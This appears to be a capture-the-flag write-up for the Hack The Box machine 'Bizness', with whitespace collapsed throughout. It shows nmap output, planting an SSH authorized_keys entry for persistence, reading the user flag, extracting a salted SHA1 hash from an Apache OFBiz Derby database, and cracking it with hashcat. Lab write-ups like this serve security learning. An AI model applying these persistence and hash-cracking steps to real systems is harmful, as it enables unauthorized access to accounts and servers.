PORTSTATESERVICEREASONVERSION22/tcpopensshsyn-ackOpenSSH8.4p1Debian5+deb11u3 (protocol 2.0)|ssh-hostkey:|30723e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)<<--snipped-->>|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOjcxHOO/Vs6yPUw6ibE6gvOuakAnmR7gTk/yE2yJA/380/tcp open http syn-ack nginx 1.18.0|_http-title: Did not follow redirect to https://bizness.htb/| http-methods:|_ Supported Methods: GET HEAD POST OPTIONS|_http-server-header: nginx/1.18.0443/tcp open ssl/http syn-ack nginx 1.18.0|_ssl-date: TLS randomness does not represent time|_http-title: 400 The plain HTTP request was sent to HTTPS port| http-methods:|_ Supported Methods: OPTIONS GET HEAD POST| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2023-12-14T20:03:40| Not valid after: 2328-11-10T20:03:40| MD5: b182:2fdb:92b0:2036:6b98:8850:b66e:da27| SHA-1: 8138:8595:4343:f40f:937b:cc82:23af:9052:3f5d:eb50| -----BEGIN CERTIFICATE-----| MIIDbTCCAlWgAwIBAgIUcNuUwJFmLYEqrKfOdzHtcHum2IwwDQYJKoZIhvcNAQEL<<--snipped-->>| c1zAVUdnau5FQSAbwjDg0XqRrs1otS0YQhyMw/3D8X+f/vPDN9rFG8l9Q5wZLmCa| zj1Tly1wsPCYAq9u570e22U=|_-----END CERTIFICATE-----| tls-alpn:|_ http/1.1|_http-server-header: nginx/1.18.0|_http-trane-info: Problem with XML parsing of /evox/about|_http-favicon: Unknown favicon MD5: 7CF35F0B3566DB84C7260F0CC357D0B8| tls-nextprotoneg:|_ http/1.136197/tcp open tcpwrapped syn-ackService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I made .ssh keys inside $HOME directory to get a stablize shell
mkdir~/.sshchmod700~/.ssh#create public key with : ssh-keygen -t rsa -b 2048echo'<your public key>'>~/.ssh/authorized_keyschmod600~/.ssh/authorized_keys#done
now simply ssh
➜Apache-OFBiz-Authentication-Bypassgit:(master) sshofbiz@bizness.htbTheauthenticityofhost'bizness.htb (10.129.176.140)'can't be established.ED25519 key fingerprint is SHA256:Yr2plP6C5tZyGiCNZeUYNDmsDGrfGijissa6WJo0yPY.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added 'bizness.htb' (ED25519) to the list of known hosts.Linux bizness 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.ofbiz@bizness:~$ cat user.txtb7c9d<--snipped-->b6a1997ofbiz@bizness:~$
Root shell
so i tried linpeas.sh, didn't found much info
found a rabbit hole for python capability
(asked for nudge)
they told to see how the app stores password
Next thing I did was to find db files, found derby directory, which is a database used in Apache
used grep to find password logs
if you read the program, you'll see it's using sha1 for hashing, searched for "sha"
program : https://github.com/apache/ofbiz/blob/trunk/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java
if you read the prgm, it's mentioned that the hash is url safe base encoded....
so uP0_QaVBpDWFeo8-dRzDqRwXQ2I urlsafe base64 deocde this
then hex it
salt is d (see the hash)
cyber chef url : https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9-_',true,false)To_Hex('None',0)&input=dVAwX1FhVkJwRFdGZW84LWRSekRxUndYUTJJ
add hash & salt in a file & give it to hashcat
hash:salt
Hash crack
└─#hashcat-a0-m120bizness-hash.htb../wordlists/rockyou.txthashcat (v6.2.6) starting<<snip>>Minimum password length supported by kernel: 0Maximum password length supported by kernel: 256Minimim salt length supported by kernel: 0Maximum salt length supported by kernel: 256Hashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesRules: 1<<snip>>Dictionary cache built:* Filename..: ../wordlists/rockyou.txt* Passwords.: 14344392* Bytes.....: 139921507* Keyspace..: 14344385* Runtime...: 0 secsb8fd3f41a541a435857a8f3e751cc3a91c174362:d:<snip>Session..........: hashcatStatus...........: CrackedHash.Mode........: 120 (sha1($salt.$pass))Hash.Target......: b8fd3f41a541a435857a8f3e751cc3a91c174362:dTime.Started.....: Sun Jan 7 14:28:17 2024 (0 secs) <<snip>>Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1Candidate.Engine.: Device GeneratorCandidates.#1....: mosnarak -> meisgay1Hardware.Mon.#1..: Util: 30%Started: Sun Jan 7 14:27:59 2024Stopped: Sun Jan 7 14:28:17 2024